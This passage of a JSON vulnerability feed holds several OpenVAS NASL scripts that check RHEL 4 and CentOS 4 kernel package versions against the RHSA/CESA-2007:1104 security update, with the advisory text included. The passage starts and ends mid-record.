"http://plugins.openvas.org/nasl.php?oid=870177", "id": "OPENVAS:870177", "title": "RedHat Update for kernel RHSA-2007:1104-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2007:1104-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2007-December/msg00018.html\");\n script_id(870177);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2007:1104-01\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"RedHat Update for kernel RHSA-2007:1104-01\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:03", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880327", "id": "OPENVAS:880327", "title": "CentOS Update for kernel CESA-2007:1104 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\");\n script_id(880327);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:57:10", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880333", "id": "OPENVAS:880333", "title": "CentOS Update for kernel CESA-2007:1104 centos4 x86_64", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\");\n script_id(880333);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 x86_64\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:19", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880327", "id": "OPENVAS:1361412562310880327", "title": "CentOS Update for kernel CESA-2007:1104 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014550.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880327\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~67.0.1.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:39", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880333", "id": "OPENVAS:1361412562310880333", "type": "openvas", "title": "CentOS Update for kernel CESA-2007:1104 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2007:1104 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n These updated packages fix the following security issues:\n \n A flaw was found in the handling of IEEE 802.11 frames, which affected\n several wireless LAN modules. In certain situations, a remote attacker\n could trigger this flaw by sending a malicious packet over a wireless\n network, causing a denial of service (kernel crash).\n (CVE-2007-4997, Important)\n \n A memory leak was found in the Red Hat Content Accelerator kernel patch.\n A local user could use this flaw to cause a denial of service (memory\n exhaustion). (CVE-2007-5494, Important)\n \n Additionally, the following bugs were fixed:\n \n * when running the "ls -la" command on an NFSv4 mount point, incorrect\n file attributes, and outdated file size and timestamp information were\n returned. As well, symbolic links may have been displayed as actual files.\n \n * a bug which caused the cmirror write path to appear deadlocked after a\n successful recovery, which may have caused syncing to hang, has been\n resolved.\n \n * a kernel panic which occurred when manually configuring LCS interfaces on\n the IBM S/390 has been resolved.\n \n * when running a 32-bit binary on a 64-bit system, it was possible to\n mmap page at address 0 without flag MAP_FIXED set. This has been\n resolved in these updated packages.\n \n * the Non-Maskable Interrupt (NMI) Watchdog did not increment the NMI\n interrupt counter in "/proc/interrupts" on systems running an AMD Opteron\n CPU. This caused systems running NMI Watchdog to restart at regular\n intervals.\n \n * a bug which caused the diskdump utility to run very slowly on devices\n using Fusion MPT has been resolved.\n \n All users are advised to upgrade to these updated packages, which resolve\n these issues.\";\n\ntag_affected = \"kernel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2007-December/014549.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880333\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:31:09 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2007:1104\");\n script_cve_id(\"CVE-2007-4997\", \"CVE-2007-5494\");\n script_name( \"CentOS Update for kernel CESA-2007:1104 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 